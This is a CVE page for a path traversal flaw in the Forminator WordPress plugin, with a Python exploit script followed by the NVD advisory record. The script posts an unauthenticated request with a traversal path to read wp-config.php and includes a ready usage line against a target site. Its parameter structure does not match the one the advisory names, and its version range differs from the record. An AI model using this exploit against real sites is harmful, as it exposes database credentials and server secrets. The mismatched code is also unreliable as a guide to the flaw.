CVE-2026-5192

import requests # Exploit Title: Forminator Forms < 1.52.1 - Unauthenticated Path Traversal # Description: Read arbitrary files via upload-1[file][file_path] parameter. def exploit(url, target_file): # Target endpoint usually points to the forminator submission or upload handler # Adjust the endpoint based on the specific form ID and configuration target_url = f"{url}/wp-admin/admin-ajax.php" # The payload attempts to read wp-config.php data = { 'action': 'forminator_submit_form_custom_forms', # Action may vary 'form_id': '1', 'current_url': url, 'upload-1': { 'file_name': 'exploit.txt', 'file_path': target_file, # Path traversal payload, e.g., '../../../wp-config.php' 'file_size': 1000 } } # Note: Real exploitation requires matching the specific nonce and form structure # if enforced, but this CVE states unauthenticated access under specific conditions. try: response = requests.post(target_url, data=data) if response.status_code == 200: print(f"[+] Request sent. Check if file content is leaked in response or email.") print(response.text) except Exception as e: print(f"[-] Error: {e}") # Usage # exploit('http://target-site.com', '../../../wp-config.php')

{"cve": {"id": "CVE-2026-5192", "sourceIdentifier": "[email protected]", "published": "2026-05-05T07:16:00.643", "lastModified": "2026-05-05T19:08:20.090", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Forminator Forms – Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Path Traversal in versions up to, and including, 1.52.1 via the 'upload-1[file][file_path]' parameter. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. Successful exploitation requires a publicly accessible form with a File Upload field where Save and Continue is enabled in that form's Behavior settings and the Save and Continue email notification is configured to attach uploaded files in Email Notifications."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3500671/forminator", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/788422c4-e070-48aa-a85d-a5d5a25a6a1d?source=cve", "source": "[email protected]"}]}}